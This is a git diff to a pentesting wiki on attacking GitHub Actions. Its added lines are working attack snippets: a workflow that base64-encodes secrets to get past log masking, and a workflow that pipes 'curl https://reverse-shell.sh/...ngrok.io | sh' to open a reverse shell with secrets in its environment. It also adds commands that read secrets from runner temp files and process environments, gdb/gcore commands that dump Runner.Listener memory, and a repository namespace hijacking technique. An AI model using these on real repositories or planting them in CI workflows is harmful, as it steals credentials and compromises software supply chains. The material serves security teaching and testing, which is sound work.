diff --git a/.gitbook/assets/image (97).png b/.gitbook/assets/image (97).png
new file mode 100644
index 0000000000..ee3d116e8a
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diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/pentesting-ci-cd/github-security/abusing-github-actions/README.md
index 6336223463..5fb99a8d96 100644
--- a/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -155,6 +155,10 @@ jobs:
+It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
## Allowed Execution
{% hint style="info" %}
@@ -248,6 +252,12 @@ Moreover, according to the docs: The workflow started by the `workflow_run` even
This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
+### `workflow_call`
+TODO: Check if when executed from a pull\_request the used/downloaded code if the one from the origin or from the forked PR
## Abusing Forked Execution
We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
@@ -370,7 +380,13 @@ jobs:
### Deleted Namespace Repo Hijacking
-This is a good blog post to read about fixed vulnerabilities that would allow an attacker to steal a deleted namespace to steal a famous repo (potentially because of a rename of the namespace): [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
+If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
+{% hint style="danger" %}
+So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+{% endhint %}
+If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
@@ -417,7 +433,71 @@ Check the following pages:
If you are injecting content into a script it's interesting to know how you can access secrets:
* If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+List secrets in Github Action output
+name: list_env
+ workflow_dispatch: # Launch manually
+ pull_request: #Run it when a PR is created to a branch
+ branches:
+ - '**'
+ push: # Run it when a push is made to a branch
+ branches:
+ - '**'
+ List_env:
+ runs-on: ubuntu-latest
+ steps:
+ - name: List Env
+ # Need to base64 encode or github will change the secret value for "***"
+ run: sh -c 'env | grep "secret_" | base64 -w0'
+ env:
+ secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+Get reverse shell with secrets
+name: revshell
+ workflow_dispatch: # Launch manually
+ pull_request: #Run it when a PR is created to a branch
+ branches:
+ - '**'
+ push: # Run it when a push is made to a branch
+ branches:
+ - '**'
+ create_pull_request:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Get Rev Shell
+ run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+ env:
+ secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
* If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
+ * ```bash
+ cat /home/runner/work/_temp/*
+ ```
+* For a JavaScript actions the secrets and sent through environment variables
+ * ```bash
+ ps axe | grep node
+ ```
* For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
@@ -432,6 +512,17 @@ The way to find which **Github Actions are being executed in non-github infrastr
**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
+In self-hosted runners it's also possible to obtain the **secrets from the **_**Runner.Listener**_** process** which will contain all the secrets of the workflows at any step by dumping its memory:
+{% code overflow="wrap" %}
+sudo apt-get install -y gdb
+sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
+{% endcode %}
+Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
### Github Docker Images Registry
It's possible to make Github actions that will **build and store a Docker image inside Github**.\
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
index 45ba05a137..eb44be9082 100644
--- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
+++ b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
@@ -816,7 +816,7 @@ When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1" %}